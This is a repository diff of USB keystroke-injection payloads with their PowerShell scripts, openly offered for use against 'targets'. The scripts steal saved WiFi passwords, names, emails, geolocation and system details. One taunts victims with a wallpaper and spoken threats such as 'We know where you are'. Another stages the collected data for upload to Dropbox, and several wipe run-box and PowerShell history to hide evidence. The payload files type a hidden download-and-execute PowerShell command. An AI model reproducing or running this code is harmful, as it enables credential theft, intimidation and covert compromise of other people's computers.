# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
Public IP, and and the SSID and WiFi password of any current or previously connected to networks.
It will take the gathered information and generate a .jpg with that information on show
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop
#>
#############################################################################################################################################
# this is the message that will be coded into the image you use as the wallpaper
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# this will be the name of the image you use as the wallpaper
$ImageName = "dont-be-suspicious"
#############################################################################################################################################
<#
.NOTES
This will get the name associated with the microsoft account
#>
function Get-Name {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fn = Get-Name
echo "Hey" $fn >> $Env:temp\foo.txt
echo "`nYour computer is not very secure" >> $Env:temp\foo.txt
#############################################################################################################################################
<#
.NOTES
This is to get the current Latitide and Longitude of your target
#>
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
#############################################################################################################################################
<#
.NOTES
This will get the public IP from the target computer
#>
function Get-PubIP {
try {
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
# If no Public IP is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No Public IP was detected"
return $null
-ErrorAction SilentlyContinue
}
return $computerPubIP
}
$PubIP = Get-PubIP
if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt }
###########################################################################################################
<#
.NOTES
Password last Set
This function will custom tailor a response based on how long it has been since they last changed their password
#>
function Get-Days_Set {
#-----VARIABLES-----#
# $pls (password last set) = the date/time their password was last changed
# $days = the number of days since their password was last changed
try {
$pls = net user $env:USERNAME | Select-String -Pattern "Password last" ; $pls = [string]$pls
$plsPOS = $pls.IndexOf("e")
$pls = $pls.Substring($plsPOS+2).Trim()
$pls = $pls -replace ".{3}$"
$time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
$DateArray =$time.Split(".")
$days = [int]$DateArray[0]
return $pls
}
# If no password set date is detected funtion will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting
catch {Write-Error "Day password set not found"
return $null
-ErrorAction SilentlyContinue
}
}
$pls = Get-Days_Set
if ($pls) { echo "`nPassword Last Set: $pls" >> $Env:temp\foo.txt }
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This function will gather all current Networks and Passwords saved on the target computer
They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
#>
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
}
if (!$WLANProfileObjects) { Write-Host "variable is null"
}else {
# This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage
echo "`nW-Lan profiles: ===============================" $WLANProfileObjects >> $Env:temp\foo.txt
$content = [IO.File]::ReadAllText("$Env:temp\foo.txt")
}
#############################################################################################################################################
<#
.NOTES
This will get the dimension of the targets screen to make the wallpaper
#>
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
#############################################################################################################################################
<#
.NOTES
This will get take the information gathered and format it into a .jpg
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:tmp\foo.jpg"
$bmp = new-object System.Drawing.Bitmap $w,$h
$font = new-object System.Drawing.Font Consolas,18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString($content,$font,$brushFg,500,100)
$graphics.Dispose()
$bmp.Save($filename)
# Invoke-Item $filename
#############################################################################################################################################
<#
.NOTES
This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
Then it will clean up the files you don't want to leave behind
#>
echo $hiddenMessage > $Env:temp\foo.txt
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
<#
.NOTES
This will take the image you generated and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#----------------------------------------------------------------------------------------------------
function clean-exfil {
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
#----------------------------------------------------------------------------------------------------
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
clean-exfil

20
payloads/library/prank/-RD-Wallpaper-Troll/payload.txt Normal file
View File

@ -0,0 +1,20 @@
REM Title: Wallpaper-Troll
REM Author: I am Jakoby
REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM --------------------------------------------------------------------------------------
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM --------------------------------------------------------------------------------------
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-Wallpaper-Troll/Wallpaper-Troll.ps1?dl=1?dl=1; invoke-expression $pl
DELAY 500
ENTER

BIN
payloads/library/prank/-RD-Wallpaper-Troll/wp-troll.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 89 KiB

102
payloads/library/prank/-RD-We-Found-You/README.md Normal file
View File

@ -0,0 +1,102 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# We-Found-You
This script is ready to run as is. Just download and execute with the provided link.
## Description
This script will get the GeoLocation (Latitude and Longitude) of your target.
Then a page will open in their browser with a map of their current location on it
Their system volume will be turned to max level
And sapi speak with talk through their speakers the message provided or a custom one you provide
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-We-Found-You/location.jpg)
## Getting Started
### Dependencies
* Windows 10,11
* Their location services are turned on
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-We-Found-You/found-you.ps1?dl=1; invoke-expression $pl
ENTER
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-We-Found-You)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

176
payloads/library/prank/-RD-We-Found-You/found-you.ps1 Normal file
View File

@ -0,0 +1,176 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
The targets Location Services must be turned on or this payload will not work
.SYNOPSIS
This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are
.DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
#>
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to get the Name associate with the targets microsoft account, if not detected UserName will be used
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to get the current Latitide and Longitude of your target
#>
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
$GL = Get-GeoLocation
$GL = $GL -split " "
$Lat = $GL[0].Substring(11) -replace ".$"
$Lon = $GL[1].Substring(10) -replace ".$"
Pause-Script
# Opens their browser with a map of their current location
Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon"
Start-Sleep -s 3
# Sets Volume to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
# Sets up speech module
$s=New-Object -ComObject SAPI.SpVoice
$s.Rate = -2
$s.Speak("We found you $FN")
$s.Speak("We know where you are")
$s.Speak("We are everywhere")
$s.Speak("Expect us")
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

BIN
payloads/library/prank/-RD-We-Found-You/location.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 114 KiB

16
payloads/library/prank/-RD-We-Found-You/payload.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: Rage-PopUps
REM Author: I am Jakoby
REM Description: This payload is meant to open a map in your targets web browser with their current location
REM Target: Windows 10, 11
REM --------------------------------------------------------------------------------------
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM --------------------------------------------------------------------------------------
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-We-Found-You/found-you.ps1?dl=1; invoke-expression $pl
ENTER

407
payloads/library/recon/Tree_of_Knowledge/-RD-ADV-Recon/ADV-Recon.ps1 Normal file
View File

@ -0,0 +1,407 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This is an advanced recon of a target PC and exfiltration of that data
.DESCRIPTION
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running
All of the gather information is formatted neatly and output to a file
That file is then exfiltrated to cloud storage via DropBox
.Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
#>
############################################################################################################################################################
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
############################################################################################################################################################
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
############################################################################################################################################################
# Get nearby wifi networks
try
{
$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
}
catch
{
$NearbyWifi="No nearby wifi networks detected"
}
############################################################################################################################################################
# Get info about pc
# Get IP / Network Info
try
{
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
catch
{
$computerPubIP="Error getting Public IP"
}
$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
############################################################################################################################################################
$IsDHCPEnabled = $false
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
foreach ($Network in $Networks) {
If($network.DHCPEnabled) {
$IsDHCPEnabled = $true
}
$MAC = ipconfig /all | Select-String -Pattern "physical" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17)
}
############################################################################################################################################################
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement
$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List
$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List
$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table
############################################################################################################################################################
# Get HDDs
$driveType = @{
2="Removable disk "
3="Fixed local disk "
4="Network disk "
5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }
#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table
# Check RDP
$RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
$RDP = "RDP is Enabled"
} else {
$RDP = "RDP is NOT enabled"
}
############################################################################################################################################################
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
}
############################################################################################################################################################
# local-user
$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.ProcessName
}
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table
# process last
$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine
# service
$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName
# installed software (get uninstaller)
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
# drivers
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
############################################################################################################################################################
# MAKE LOOT FOLDER
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_computer_recon.txt"
############################################################################################################################################################
# OUTPUTS RESULTS TO LOOT FILE
Clear-Host
Write-Host
echo "Name:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $FN >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "Email:" >> $env:TMP\$FileName
